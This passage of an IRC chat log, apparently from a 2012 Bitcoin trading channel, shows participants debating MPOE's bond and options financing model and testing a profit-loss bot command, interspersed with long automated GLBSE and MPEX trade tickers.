is, why would mpoe change how they do things to a better way which just happens to be a little worse for mpoe? Aug 13 22:24:58 call it mope-note, but not a bond :) Aug 13 22:25:01 smickles it wouldn't be either better or worsde for mpoe, the % would just be smaller. Aug 13 22:25:08 EskimoBob yeah, i guess so. Aug 13 22:25:31 the thing is tho, bear with me. you have a math model that generates say 1%. Aug 13 22:25:39 I am not saying taht the instrument you have is bad Aug 13 22:25:40 mircea_popescu: so then where would the funds to cover losses come from? Aug 13 22:25:43 not at all. Aug 13 22:25:47 but due to variance this could in any given interval be either -x% or +x% Aug 13 22:25:54 or am i just not thinking of this correctly Aug 13 22:26:06 I am just saying that this is not a bond as we know bonds Aug 13 22:26:24 smickles i could easily issue bonds at a fixed rate and just shrug. it would break the current price discovery mechanism in the mpoe-bond inverse licitations tho Aug 13 22:26:39 EskimoBob that's for sure. in fact nothing in btc is "like we know". Aug 13 22:26:42 smickles: in FRN you always have a fixed+floating Aug 13 22:26:48 my curiosity was merely if this is the closest to a bond that we have. Aug 13 22:27:08 EskimoBob: but the floating can't be negative, right? Aug 13 22:27:19 mircea_popescu: yes, until everything is OK Aug 13 22:27:19 at lowest 0 Aug 13 22:27:52 EskimoBob you mean for as long as everything is ok ? Aug 13 22:28:05 so you default on your coupon but pay back the principal ? Aug 13 22:28:06 mircea_popescu: arn't those ppt.X things zero cupon bonds? Aug 13 22:28:36 a those things. Aug 13 22:28:40 those are zeros and zeros Aug 13 22:28:43 what bothers me more about the bonds is how people offering money for lending tie up their money even if mpoe never uses it Aug 13 22:28:49 hmm, i guess it could be argued lol. except... Aug 13 22:28:55 copumpkin: +1 Aug 13 22:29:08 I'd also be reluctant to call them bonds Aug 13 22:29:09 copumpkin yeah, it's the #1 complaint i hear. but that's there to ensure competition tho Aug 13 22:29:09 copumpkin: and thst why lender MUST be rewarded! Aug 13 22:29:36 but regardless, I'm not even going to try if there's a chance my money will get tied up for a period without any earnings on it at all Aug 13 22:29:38 or this is just no good Aug 13 22:29:49 what it ensures, from most people I've spoken to, is very little money offered :P Aug 13 22:29:54 [GLBSE] [TYGRR.BOND-PI] 1 @ 1.6 BTC [-] Aug 13 22:30:10 well so far it was oversubscribed from what i see. Aug 13 22:30:33 mircea_popescu: wouldn't there be competition even w/o the 'tie up'? Aug 13 22:30:38 mircea_popescu: that doesn't mean there was competition Aug 13 22:30:46 smickles why would there be ? Aug 13 22:30:50 copumpkin how do you figure ?! Aug 13 22:30:53 and this part: not getting paid If i did not use it" has to go too :) Aug 13 22:30:59 loan is a loan Aug 13 22:31:18 EskimoBob if either of those go i'd have to take out the "pick your own %" Aug 13 22:31:22 use it or not - you still pay interest Aug 13 22:31:25 mircea_popescu: oh, there might have been competition, but not as much as there might have been if you hadn't tied it up :) since many potential competitors might abstain from participating, just because of the risk, even if they were willing to offer low rates Aug 13 22:31:33 and i don't want to, cause imo that's the main value of the entire thing, it allows me to have a mpbor Aug 13 22:31:35 mircea_popescu: take it out Aug 13 22:31:51 you can discount the bond or if they get oversubscribed, sell at premium Aug 13 22:31:55 done every day Aug 13 22:31:57 copumpkin i actually am thinking of taking the 5% rate out completely, and let it freefloat. Aug 13 22:32:00 that'll be interesting. Aug 13 22:32:13 how do you mean EskimoBob ? Aug 13 22:32:25 simple Aug 13 22:32:46 you set the rules when bond will be sold at discount and when at premium Aug 13 22:33:00 it has to be actively managed. Aug 13 22:33:05 now you set the date etc Aug 13 22:33:19 this is a big problem in btc cause it opens me up to being charged of various malfeasances. Aug 13 22:33:32 seeing how everyone's anon. Aug 13 22:33:39 you sell all bond out at once - and depends, what was the demand, you rise or lower the price Aug 13 22:33:47 to get most investors Aug 13 22:33:48 but i only know the demand retrospectively. Aug 13 22:33:57 there is no nee dto invent the wheel Aug 13 22:34:14 it's all available in the net Aug 13 22:34:28 man. i only need what capital i need in august on august the 31st Aug 13 22:34:31 what do i do, time travel ? Aug 13 22:34:52 so you set the date, coupon and maturity and price Aug 13 22:35:00 and go from there Aug 13 22:35:11 i think we're talking at crosspurposes. Aug 13 22:35:24 how can i get capital for august 5 on august the 31st ? Aug 13 22:35:28 maybe you sell some at discount to secure larger part and those who wait, get shittier price Aug 13 22:35:50 no, you need to get it upfront Aug 13 22:35:57 i don't know how much i need upfront. Aug 13 22:36:16 make a plan :) honestly Aug 13 22:36:20 i can't. Aug 13 22:36:28 sometimes options sell some other times they do not. Aug 13 22:36:38 how do i plan for the future when the very essence of this future is the unknown ? Aug 13 22:36:53 same way most companies do? :P Aug 13 22:36:55 and now we are at what I told you earlier - bond is not a good way to finance stuff like that Aug 13 22:37:11 copumpkin yeah buit companies have something to go on. i scarcely do. Aug 13 22:37:22 EskimoBob now that's a point. Aug 13 22:37:23 mircea_popescu: do you wriet the options? Aug 13 22:37:35 well, there's a bot, but it's my bot so yeah. Aug 13 22:37:43 altho people also write their own. Aug 13 22:37:47 puts and calls or is there someone else, who writes them (seller) Aug 13 22:38:10 it varies, atm i have written a lot of calls, others wrote a lot of puts. Aug 13 22:38:13 so how thy back up their options? Aug 13 22:38:19 they deposit. Aug 13 22:38:33 dud, you write calls whn you hope the market drops Aug 13 22:39:21 i write both at all times, at some prices. Aug 13 22:39:31 it is after all a market maker. Aug 13 22:39:32 do you let people write so called naked options? Aug 13 22:39:55 nope. Aug 13 22:39:56 nope Aug 13 22:40:02 do I understand you correclty that you need the funds to cover your options? Aug 13 22:40:05 naked options are the bane of finance. Aug 13 22:40:16 naked women too Aug 13 22:40:25 EskimoBob: yeah, he holds 'surety' for written options Aug 13 22:40:26 EskimoBob the way mpoe is set-up it's a 0 capital venture. it has no capital of its own. Aug 13 22:40:45 and you still have none? Aug 13 22:40:57 all it makes is pushed to shareholders and bondhoders Aug 13 22:41:00 it can never have any. Aug 13 22:41:02 well, surety for 'customer writen options' Aug 13 22:41:07 that's the customer's. Aug 13 22:41:51 now lets rewind a bit. Aug 13 22:42:20 you need to figure out how to accumulate some wroking capital and stop sending it out to share holders and what not Aug 13 22:42:36 it's pointless Aug 13 22:42:39 i think that's against the business model Aug 13 22:42:40 [MPEX] [S.MPOE] 3995 @ 0.00032702 = 1.3064 BTC [+] Aug 13 22:42:41 [MPEX] [S.MPOE] 958 @ 0.00033029 = 0.3164 BTC [+] Aug 13 22:42:42 [MPEX] [S.MPOE] 48200 @ 0.00033304 = 16.0525 BTC [+] Aug 13 22:42:44 [MPEX] [S.MPOE] 16847 @ 0.00033585 = 5.6581 BTC [+] Aug 13 22:42:50 what do you mean "pointless" ? Aug 13 22:43:13 not holding on to money has at least the very good quality of reducing risk. Aug 13 22:43:16 is you businesmodel to pay for money you can get for lot less? Aug 13 22:43:19 just look at bitcoinica to understand. Aug 13 22:43:24 yes. Aug 13 22:43:42 bitcoinic was a joke Aug 13 22:43:46 if i wanted to run mpoe as a private thing i could have continued to do so, indefinitely. Aug 13 22:43:54 my goal is to develop btc financials tho. Aug 13 22:44:24 if you pay less often your divs, do your shareholders income go up or down? Aug 13 22:44:27 [GLBSE] [ASICMINER] 100 @ 0.1 = 10 BTC [+] Aug 13 22:44:35 they've always been paid monthly. Aug 13 22:44:37 as total Aug 13 22:44:50 but i think a laeger share of the price is due to the company/prospects than to the direct dividend. Aug 13 22:45:04 seeing how miner bonds trade at arround 30-35x their dividend and mpoe seems more like 300x Aug 13 22:45:04 EskimoBob: down due to loss of timevalue of money Aug 13 22:45:09 pass a motion to accumulate some for operations Aug 13 22:45:16 why ? Aug 13 22:45:39 oh lets not start that BS especially in a case, where you buy money for more than you have to :) Aug 13 22:45:50 his argument is lower operational costs means a higher dividend Aug 13 22:46:03 im not sure i follow this. Aug 13 22:46:26 sorry. lets me expl. what I mean Aug 13 22:46:26 if mpoe actually held some capital, it wouldn't have to buy money Aug 13 22:46:37 or at least not as much Aug 13 22:46:45 one more question. have you done any fin planning for a company? Aug 13 22:46:51 yes. Aug 13 22:47:23 ok, so this can not be to hard then Aug 13 22:47:57 you can plan your options business - yes (no is not accepted :) Aug 13 22:48:21 depends what you mean by plan. Aug 13 22:48:25 if you mean limit then yes. Aug 13 22:49:01 yes, this is what I mean. But lets not forget, it can grow too. And this is what you do: you figure out what you can manage per month Aug 13 22:49:13 i do not wish to limit it. Aug 13 22:49:23 you use real bond or issue shares to finance it Aug 13 22:49:27 the btc market is by its nature in a position where those liniar assumptions are harmful. Aug 13 22:49:29 so you can service your debt Aug 13 22:49:32 now, Aug 13 22:49:39 EskimoBob : again, i could easily just use my own capital to finance all of it. Aug 13 22:50:00 it never used more than 10k iirc, and i'm significantly above that, personally. Aug 13 22:50:10 so what is your problem? Why do you buy money at some absurd rate? Aug 13 22:50:20 because i want to create a refinance market for btc. Aug 13 22:50:33 but you need money to make money :) Aug 13 22:50:36 which currently does not exist. Aug 13 22:50:58 in part because of scam assets like ppt, in part because the boneheaded idiots on the forum are playing ther citizen dentist Aug 13 22:51:01 in part for other reasons. Aug 13 22:51:03 mircea_popescu: suppose the 'bonds' people subscribe to were done with a multisig transaction some how where the lender could recall the funds before they are used (or marked for use) by mpoe? Aug 13 22:51:11 but i have done my math and i think i am large enough to push this through. Aug 13 22:51:44 smickles this is already there, people can just notify they want their money back Aug 13 22:51:50 ah Aug 13 22:52:26 is kakobrekla gonna start spuirting asset lines now ? :D Aug 13 22:52:30 mircea_popescu: is there any way to find out if the funds are going to (or likely to) be used? Aug 13 22:52:50 well, not really. and any way you can't recall them during their current month. Aug 13 22:52:55 lol, quick, make a trade ! Aug 13 22:53:09 mircea_popescu, i added mpex dividend payments to assbot Aug 13 22:53:10 suppose month ends on 28th july, 31st of august Aug 13 22:53:18 if you send money on the 5th of august you can ask for it back on the 20th Aug 13 22:53:19 and another feature soon to be revealed Aug 13 22:53:23 but anyway it's not used till the 31st. Aug 13 22:53:28 kakobrekla o cool! Aug 13 22:53:51 which is why most people send towards the end of a month. Aug 13 22:54:11 i think your model is "upside down" Aug 13 22:54:37 aha ? Aug 13 22:54:43 the moment you plan and finance it the other way around, you will have a good bond buyers market Aug 13 22:54:57 mmm. ellaborate on this. Aug 13 22:56:16 yes, in this case you need to take the risk but you can plan your exposure for a starting month in options market and start accumulate capital to run it properly Aug 13 22:56:27 "properly" Aug 13 22:56:29 if you write options, you can cover your ass well Aug 13 22:56:38 i don't believe we need to try and replicate fiat instruments in btc. Aug 13 22:56:44 it's not that big deal - unless you get greedy Aug 13 22:56:53 i believe we need to proceed deductively based on btc principles and come up with functional instruments Aug 13 22:56:57 mircea_popescu: what you should do is allow it to automatically purchase and run from algorhithmicaly determined hosting services while also setting up all the manual operations in automatic form. Then, release it like one of those 'lucky lantern' things Aug 13 22:57:02 which, probably, will be very contorted in fiat terms. Aug 13 22:57:27 smickles maybe. except the problem of ipo. Aug 13 22:57:56 copy with pride! no need to waste time on inventing wheels Aug 13 22:58:07 trust me, i have no problem copying what works. Aug 13 22:58:15 the issue here is tat most of fiat is rotten to the core and unusable. Aug 13 22:58:25 forget the fiat Aug 13 22:58:29 fake floaters. they have a bad reputation in fiat Aug 13 22:58:34 you have no need for it in this model Aug 13 22:58:37 for the reason recently discovered : libor was fixed. Aug 13 22:58:53 people always knew libor is shit. Aug 13 22:59:02 it's the people, not the instrument :) Aug 13 22:59:21 EskimoBob, try it now Aug 13 22:59:25 :p Aug 13 22:59:40 !pl ZIP.A 500@0.95 2012-07-29 Aug 13 22:59:40 Requesting data from GLBSE (might take a while). Aug 13 22:59:58 ZIP.A [500@0.95BTC] (since: 2012-07-29) paid: 2.76743 BTC. Last price: 0.51 BTC. Capital gain: -22 BTC. Total: -217.23257 BTC. (-45.7%) Aug 13 23:00:02 !help Aug 13 23:00:03 yess! :) Aug 13 23:00:13 !pl Aug 13 23:00:14 !pl [@] [] Aug 13 23:00:18 no help mircea_popescu :( Aug 13 23:00:22 ok whats the pl do then ? Aug 13 23:00:32 profit loss calc Aug 13 23:01:20 mmm Aug 13 23:01:30 !pl GIGAMINING 10@1.145 2012-08-03 Aug 13 23:01:31 Requesting data from GLBSE (might take a while). Aug 13 23:01:44 !pl gigamining 1 Aug 13 23:02:07 !pl GIGAMINING 900@.9 2012-04-15 Aug 13 23:02:08 i think it needs to send e-mail to nefario every time it waits :) Aug 13 23:02:14 GIGAMINING [10@1.145BTC] (since: 2012-08-03) paid: 0.34825 BTC. Last price: 1.139599 BTC. Capital gain: -0.05401 BTC. Total: 0.29424 BTC. (2.6%) Aug 13 23:02:14 Requesting data from GLBSE (might take a while). Aug 13 23:02:21 o wow one at a time huh Aug 13 23:02:29 ye Aug 13 23:02:34 GIGAMINING [1@1BTC] paid: 0.38322596 BTC. Last price: 1.139599 BTC. Capital gain: 0.139599 BTC. Total: 0.52282496 BTC. (52.3%) Aug 13 23:02:34 Requesting data from GLBSE (might take a while). Aug 13 23:02:36 get in line Aug 13 23:02:40 :> Aug 13 23:02:51 GIGAMINING [900@0.9BTC] (since: 2012-04-15) paid: 344.903364 BTC. Last price: 1.139599 BTC. Capital gain: 215.6391 BTC. Total: 560.542464 BTC. (69.2%) Aug 13 23:02:56 mircea_popescu: what? ppl cant hold shares in some autonomous program with no human controller? what's the problem of ipo in that situation? Aug 13 23:03:06 that you can't let random idiots ipo. Aug 13 23:03:14 ah Aug 13 23:03:21 once you have to have human hands in there Aug 13 23:03:24 the entire lantern collapses. Aug 13 23:03:39 (just to show you i did consider things there( Aug 13 23:04:07 what if it were just an options 'lantern' Aug 13 23:04:15 !pl GIGAMINING 2012-08-01 Aug 13 23:04:15 Requesting data from GLBSE (might take a while). Aug 13 23:04:29 what if the math model proves it could benefit from some tweaking ? Aug 13 23:04:31 GIGAMINING [1@2BTC] paid: 0.38322596 BTC. Last price: 1.139599 BTC. Capital gain: -0.860401 BTC. Total: -0.47717504 BTC. (-23.9%) Aug 13 23:04:50 aha Aug 13 23:04:52 buggy Aug 13 23:05:07 indeed Aug 13 23:05:10 lemme fix Aug 13 23:05:31 it still uses the date Aug 13 23:05:35 yup Aug 13 23:05:42 it will spit out error now Aug 13 23:05:54 better make it use defaults than spit error Aug 13 23:05:55 mircea_popescu: damn. you'd need some fairly sweet AI Aug 13 23:06:03 there is no defaults Aug 13 23:06:04 smickles i just think we're not there yet :p Aug 13 23:06:07 with the price Aug 13 23:07:02 if no price, use 1 share Aug 13 23:07:21 1 is/can be the default kakobrekla Aug 13 23:07:39 it uses one share when no nb shares is specified Aug 13 23:07:43 but when no input price Aug 13 23:07:47 it will break Aug 13 23:07:48 !pl Aug 13 23:07:48 !pl [@] [] Aug 13 23:08:00 OK; I see Aug 13 23:08:05 whats in [] is optional Aug 13 23:08:57 mircea_popescu: how about the lantern is just the options exchange, the market is made by it's users and your /independant/ market making bot Aug 13 23:08:58 you know it only answers to 10 requests form same IP in 60 sec Aug 13 23:09:02 or was it 20*? Aug 13 23:09:05 20? Aug 13 23:09:16 that way the market maker's code can be updated Aug 13 23:09:32 smickles: bots are evil Aug 13 23:10:03 EskimoBob: yeah, but we can't leave evil out of sci-fi stuff like this Aug 13 23:10:17 besides, the whole thing would be a bot anyway Aug 13 23:10:33 but writing rules when somone can and can not write options is not that hard Aug 13 23:10:41 or even buy Aug 13 23:11:23 and lets not forget the joys of margin trading :) Aug 13 23:11:36 all math - no emotions Aug 13 23:11:59 smickles maybe. i think it;s pretty close to that as it is. Aug 13 23:12:07 imo, the hard part is getting it to find, acquire, and setup the hosting Aug 13 23:12:43 of itself Aug 13 23:12:43 OF ITSELF!!! Aug 13 23:12:52 you have long term investors, holding large piles of stocks and turds? You can borrow securities and not frack around with bond issues to finance it Aug 13 23:12:59 smickles especially a hosting that won't pull a linode Aug 13 23:13:11 all expenses are passed to clients who write options Aug 13 23:13:17 risk too :) Aug 13 23:13:29 whazzat EskimoBob ? Aug 13 23:13:29 and you keep the collateral Aug 13 23:13:44 this is how it's done Aug 13 23:14:57 btw, im curious if anyone owning mining bonds at any point ever owned a perpetual frn. Aug 13 23:15:02 (i have, both, but i mean anyone else) Aug 13 23:15:11 you keep their BTC and other sec a collateral if the options start to go rally bad Aug 13 23:15:54 there is no frn in GLBSE ... I think. Aug 13 23:16:06 i meant irl. Aug 13 23:16:34 (you can make synthetic frns from a fixed-rate bond like you favour and a swap, you know) Aug 13 23:17:04 afk now Aug 13 23:21:44 mircea_popescu: i wonder if i'm replicating your database tables, just with different names Aug 13 23:22:00 why that ? Aug 13 23:23:12 mircea_popescu: well, i'm making db tables of my own to hold data for mpex sub-accounts Aug 13 23:23:21 ah hehe Aug 13 23:23:43 not unless you include nudie pics. Aug 13 23:25:31 !pl GIGAMINING 2012-08-01 Aug 13 23:25:31 Requesting data from GLBSE (might take a while). Aug 13 23:25:31 Invalid price supplied. Aug 13 23:25:45 !pl GIGAMINING 1 2012 Aug 13 23:25:46 Requesting data from GLBSE (might take a while). Aug 13 23:25:46 Ignoring invalid date. Aug 13 23:25:54 ok, i should call this thing "smickles' MPEX" or "SMEx" for short Aug 13 23:26:31 GIGAMINING [1@1BTC] paid: 0.38322596 BTC. Last price: 1.139599 BTC. Capital gain: 0.139599 BTC. Total: 0.52282496 BTC. (52.3%) Aug 13 23:26:57 well its gonna stay like this for now Aug 13 23:27:07 its slow as fuck because of glbse Aug 13 23:27:14 and 2 seperate calls Aug 13 23:27:23 one on site one on api Aug 13 23:27:27 meh Aug 13 23:27:28 smex lol Aug 13 23:27:30 enjoy Aug 13 23:27:33 or SmEX Aug 13 23:27:52 kakobrekla it is incredibly slow innit. Aug 13 23:27:57 ye Aug 13 23:29:12 url: https://mostofmany.com/get/smex Aug 13 23:29:19 that will work out great Aug 13 23:29:27 (nothing at that url yet) Aug 13 23:29:45 your cert is bad Aug 13 23:30:43 spam! Aug 13 23:30:50 mircea_popescu: lol, it's the apache default cert Aug 13 23:31:04 [GLBSE] [FPGAMINING] 8 @ 0.94 = 7.52 BTC [+] Aug 13 23:31:04 [GLBSE] [FPGAMINING] 5 @ 0.89 = 4.45 BTC [-] Aug 13 23:31:05 [GLBSE] [YABIF] 1 @ 1 BTC [-] Aug 13 23:31:06 [GLBSE] [GIGAMINING] 4 @ 1.139599 = 4.5584 BTC [+] Aug 13 23:31:07 [GLBSE] [TYGRR.BOND-P] 9 @ 1.0495 = 9.4455 BTC [+] Aug 13 23:31:08 [GLBSE] [ZETA-MINING] 2 @ 0.2 = 0.4 BTC [-] Aug 13 23:31:09 [GLBSE] [TYGRR.BOND-P] 27 @ 1.0498 = 28.3446 BTC [+] Aug 13 23:31:10 [MPEX] [F.GIGA.ETF] 8500 @ 0.00109162 = 9.2788 BTC [-] Aug 13 23:31:11 [GLBSE] [TYGRR.BOND-P] 14 @ 1.0499 = 14.6986 BTC [+] Aug 13 23:31:12 [GLBSE] [NASTY] 4 @ 0.545 = 2.18 BTC [-] Aug 13 23:31:12 [GLBSE] [BIB.BVPS] 3 @ 0.0044 = 0.0132 BTC [-] Aug 13 23:31:13 [GLBSE] [DMC] 100 @ 0.05 = 5 BTC [-] Aug 13 23:31:14 [GLBSE] [PLATINUM] 5 @ 0.01 = 0.05 BTC [+] Aug 13 23:31:15 [GLBSE] [ASICMINER] 10 @ 0.1 = 1 BTC [+] Aug 13 23:31:16 [GLBSE] [ASICMINER] 50 @ 0.1 = 5 BTC [+] Aug 13 23:31:17 lol assbot woke up Aug 13 23:31:17 [GLBSE] [RAREEARTH] 1 @ 0.00997 BTC [+] Aug 13 23:31:18 [GLBSE] [FUTUREFUND] 30 @ 0.00011485 = 0.0034 BTC [+] Aug 13 23:31:19 [GLBSE] [NYAN.C] 27 @ 1.08 = 29.16 BTC [-] Aug 13 23:31:20 [GLBSE] [ASIC.COOP] 1 @ 0.65 BTC [-] Aug 13 23:31:21 [GLBSE] [BTCMC] 4 @ 0.7299 = 2.9196 BTC [+] Aug 13 23:31:22 [GLBSE] [BTCMC] 3 @ 0.73 = 2.19 BTC [+] Aug 13 23:31:23 [GLBSE] [BTCMC] 1 @ 0.78999999 BTC [+] Aug 13 23:31:24 [GLBSE] [BTCMC] 2 @ 0.79 = 1.58 BTC [+] Aug 13 23:32:03 backlog cleared :p Aug 13 23:32:35 [MPEX] [S.MPOE] 16590 @ 0.00033585 = 5.5718 BTC [+] Aug 13 23:32:37 [MPEX] [S.MPOE] 7110 @ 0.00033872 = 2.4083 BTC [+] Aug 13 23:32:57 [MPEX] [O.HASH.P10TH] 85000 @ 0.02208546 = 1877.2641 BTC [-] Aug 13 23:36:20 [GLBSE] [BDK.BND] 9 @ 0.102748 = 0.9247 BTC [+] Aug 13 23:54:55 [GLBSE] [TEEK.B] 1 @ 1.09 BTC [-] Aug 13 23:55:21 [GLBSE] [YABIF] 1 @ 1 BTC [-] Aug 13 23:57:02 [GLBSE] [TYGRR.BOND-PI] 1 @ 1.6 BTC [-] Aug 14 00:00:56 [GLBSE] [TYGRR.BOND-P] 1 @ 1.0499 BTC [+] Aug 14 00:03:02 [GLBSE] [TYGRR.BOND-P] 1 @ 1.035 BTC [-] Aug 14 00:04:37 [MPEX] [S.MPOE] 33200 @ 0.00033872 = 11.2455 BTC [+] Aug 14 00:04:39 [GLBSE] [TYGRR.BOND-PI] 1 @ 1.6 BTC [-] Aug 14 00:07:03 [GLBSE] [ASICMINER] 500 @ 0.1 = 50 BTC [+] Aug 14 00:08:05 [GLBSE] [OBSI.HRPT] 2 @ 0.1031 = 0.2062 BTC [-] Aug 14 00:08:07 [GLBSE] [OBSI.HRPT] 4 @ 0.103 = 0.412 BTC [-] Aug 14 00:09:12 [GLBSE] [BITBOND] 6 @ 0.4368 = 2.6208 BTC [-] Aug 14 00:09:16 [GLBSE] [ASICMINER] 7 @ 0.1 = 0.7 BTC [+] Aug 14 00:14:55 [MPEX] [S.BVPS] 81 @ 0.00303747 = 0.246 BTC [-] Aug 14 00:14:56 [MPEX] [S.BVPS] 150 @ 0.002993 = 0.449 BTC [-] Aug 14 00:21:34 [MPEX] [F.GIGA.ETF] 7300 @ 0.0010947 = 7.9913 BTC [+] Aug 14 00:22:43 [GLBSE] [YARR] 1 @ 1.50999999 BTC [+] Aug 14 00:22:45 [GLBSE] [YARR] 3 @ 1.51 = 4.53 BTC [+] Aug 14 00:23:28 [GLBSE] [ASICMINER] 5 @ 0.1 = 0.5 BTC [+] Aug 14 00:24:54 [GLBSE] [YARR] 1 @ 1.51 BTC [+] Aug 14 00:24:56 [GLBSE] [TYGRR.BOND-P] 25 @ 1.0499 = 26.2475 BTC [+] Aug 14 00:24:57 [GLBSE] [TYGRR.BOND-P] 16 @ 1.05 = 16.8 BTC [+] Aug 14 00:30:15 [GLBSE] [ASICMINER] 8 @ 0.1 = 0.8 BTC [+] Aug 14 00:31:15 [GLBSE] [TYGRR.BOND-P] 7 @ 1.05 = 7.35 BTC [+] Aug 14 00:31:23 [GLBSE] [OBSI.HRPT] 25 @ 0.103 = 2.575 BTC [-] Aug 14 00:35:01 [GLBSE] [FOO.PPPPT] 9 @ 1.082 = 9.738 BTC [+] Aug 14 00:36:01 [GLBSE] [MU] 2 @ 0.51 = 1.02 BTC [+] Aug 14 00:36:44 [GLBSE] [YARR] 6 @ 1.51 = 9.06 BTC [+] Aug 14 00:36:46 [GLBSE] [YARR] 8 @ 1.52 = 12.16 BTC [+] Aug 14 00:36:55 [GLBSE] [ASICMINER] 3 @ 0.1 = 0.3 BTC [+] Aug 14 00:42:13 [GLBSE] [PAJKA.BOND] 5 @ 0.085 = 0.425 BTC [+] Aug 14 00:42:59 [GLBSE] [MERGEDMINING] 1 @ 0.08 BTC [-] Aug 14 00:44:05 [MPEX] [S.MPOE] 43200 @ 0.00033375 = 14.418 BTC [-] Aug 14 00:44:06 [MPEX] [S.MPOE] 31200 @ 0.00032068 = 10.0052 BTC [-] Aug 14 00:44:56 [GLBSE] [BIB.PIRATE] 3 @ 1.045 = 3.135 BTC [+] Aug 14 00:44:56 [GLBSE] [BIB.PIRATE] 44 @ 1.0475 = 46.09 BTC [+] Aug 14 00:44:58 [GLBSE] [BIB.PIRATE] 20 @ 1.048 = 20.96 BTC [+] Aug 14 00:44:59 [GLBSE] [BIB.PIRATE] 13 @ 1.049 = 13.637 BTC [+] Aug 14 00:45:58 [MPEX] [S.MPOE] 190 @ 0.00033872 = 0.0644 BTC [+] Aug 14 00:45:59 [MPEX] [S.MPOE] 17600 @ 0.00033887 = 5.9641 BTC [+] Aug 14 00:46:00 [MPEX] [S.MPOE] 7387 @ 0.00034349 = 2.5374 BTC [+] Aug 14 00:48:18 [GLBSE] [NYAN.C] 2 @ 1.05 = 2.1 BTC [-] Aug 14 00:49:49 [GLBSE] [PAJKA.BOND] 3 @ 0.0899 = 0.2697 BTC [+] Aug 14 00:50:59 [GLBSE] [ASICMINER] 7 @ 0.1 = 0.7 BTC [+] Aug 14 00:55:45 [GLBSE] [OBSI.HRPT] 3 @ 0.103 = 0.309 BTC [-] Aug 14 00:59:38 [GLBSE] [TEEK.USD] 20 @ 0.084 = 1.68 BTC [-] Aug 14 01:01:46 [GLBSE] [PPT.A] 5 @ 1.1399 = 5.6995 BTC [+] Aug 14 01:01:47 [GLBSE] [PPT.A] 4 @ 1.14 = 4.56 BTC [+] Aug 14 01:01:49 [GLBSE] [PPT.A] 11 @ 1.167 = 12.837 BTC [+] Aug 14 01:02:25 [GLBSE] [OBSI.HRPT] 15 @ 0.103 = 1.545 BTC [-] Aug 14 01:03:15 [GLBSE] [GMVT-BOT] 10 @ 0.1 = 1 BTC [-] Aug 14 01:03:57 [GLBSE] [FPGAMINING] 1 @ 0.94 BTC [+] Aug 14 01:04:44 [GLBSE] [PUREMINING] 12 @ 0.15439999 = 1.8528 BTC [+] Aug 14 01:05:21 [GLBSE] [PUREMINING] 1 @ 0.15439999 BTC [+] Aug 14 01:07:27 [GLBSE] [PPT.DIV] 2 @ 0.577 = 1.154 BTC [+] Aug 14 01:08:12 [GLBSE] [MU] 5 @ 0.51 = 2.55 BTC [+] Aug 14 01:10:15 [GLBSE] [ASICMINER] 50 @ 0.1 = 5 BTC [+] Aug 14 01:12:34 bitvps's stock sucks lately Aug 14 01:12:36 its stale Aug 14 01:13:29 we just saw $12 for a moment on gox Aug 14 01:13:42 [GLBSE] [OBSI.HRPT] 37 @ 0.103 = 3.811 BTC [-] Aug 14 01:13:57 [MPEX] [S.BVPS] 1069 @ 0.00297796 = 3.1834 BTC [-] Aug 14 01:14:26 [MPEX] [S.BVPS] 1000 @ 0.00311013 = 3.1101 BTC [+] Aug 14 01:14:53 [MPEX] [S.BVPS] 900 @ 0.00313009 = 2.8171 BTC [+] Aug 14 01:15:21 [MPEX] [S.BVPS] 50 @ 0.00313793 = 0.1569 BTC [+] Aug 14 01:15:30 wow kako Aug 14 01:15:31 really? Aug 14 01:15:33 crazy Aug 14 01:15:53 [GLBSE] [YABMC] 3 @ 0.1234 = 0.3702 BTC [+] Aug 14 01:15:54 [GLBSE] [YABMC] 114 @ 0.1235 = 14.079 BTC [+] Aug 14 01:15:55 [GLBSE] [YABMC] 105 @ 0.1237 = 12.9885 BTC [+] Aug 14 01:15:57 [GLBSE] [YABMC] 11 @ 0.1239 = 1.3629 BTC [+] Aug 14 01:15:58 [GLBSE] [YABMC] 30 @ 0.1242 = 3.726 BTC [+] Aug 14 01:15:59 [GLBSE] [YABMC] 437 @ 0.12449 = 54.4021 BTC [+] Aug 14 01:16:00 [GLBSE] [TYGRR.BOND-PI] 9 @ 1.6 = 14.4 BTC [-] Aug 14 01:16:50 [GLBSE] [BIB.PIRATE] 2 @ 1.02 = 2.04 BTC [-] Aug 14 01:17:16 https://bitcointalk.org/index.php?topic=100521.0 Aug 14 01:17:40 [GLBSE] [FOO.PPPPT] 4 @ 1.05 = 4.2 BTC [-] Aug 14 01:18:31 PsychoticBoy: another pirate front end stock? Aug 14 01:18:59 yup Aug 14 01:19:04 ;;ticker Aug 14 01:19:04 Best bid: 11.8901, Best ask: 11.938, Bid-ask spread: 0.04790, Last trade: 11.8901, 24 hour volume: 52892, 24 hour low: 11.45, 24 hour high: 12 Aug 14 01:19:06 [GLBSE] [FOO.PPPPT] 2 @ 1.05 = 2.1 BTC [-] Aug 14 01:19:12 not pirate Aug 14 01:19:38 about 15% will be invested in pirate Aug 14 01:20:04 [GLBSE] [BIB.PIRATE] 3 @ 1.0001 = 3.0003 BTC [-] Aug 14 01:20:04 [GLBSE] [BIB.PIRATE] 20 @ 1 = 20 BTC [-] Aug 14 01:24:07 [GLBSE] [TYGRR.BOND-P] 25 @ 1.05 = 26.25 BTC [+] Aug 14 01:24:25 [GLBSE] [FOO.PPPPT] 1 @ 1.03 BTC [-] Aug 14 01:24:55 [MPEX] [S.MPOE] 11100 @ 0.00032068 = 3.5595 BTC [-] Aug 14 01:25:30 [GLBSE] [OBSI.HRPT] 190 @ 0.1047 = 19.893 BTC [+] Aug 14 01:25:42 [GLBSE] [TYGRR.BOND-P] 172 @ 1.05 = 180.6 BTC [+] Aug 14 01:25:44 [GLBSE] [TYGRR.BOND-P] 13 @ 1.05 = 13.65 BTC [+] Aug 14 01:27:19 [GLBSE] [BIB.PIRATE] 10 @ 0.989 = 9.89 BTC [-] Aug 14 01:27:20 [GLBSE] [BIB.PIRATE] 3 @ 0.9863 = 2.9589 BTC [-] Aug 14 01:27:22 [GLBSE] [BIB.PIRATE] 5 @ 0.986 = 4.93 BTC [-] Aug 14 01:27:23 [GLBSE] [BIB.PIRATE] 1 @ 0.97 BTC [-] Aug 14 01:27:24 [GLBSE] [BIB.PIRATE] 7 @ 0.97 = 6.79 BTC [-] Aug 14 01:33:41 [GLBSE] [SYNERGY] 38 @ 0.195479 = 7.4282 BTC [-] Aug 14 01:34:47 rg looks up actually ? Aug 14 01:35:14 nah, more like popped back up sorta thing. Aug 14 01:38:01 [GLBSE] [TEEK.USD] 5 @ 0.084 = 0.42 BTC [-] Aug 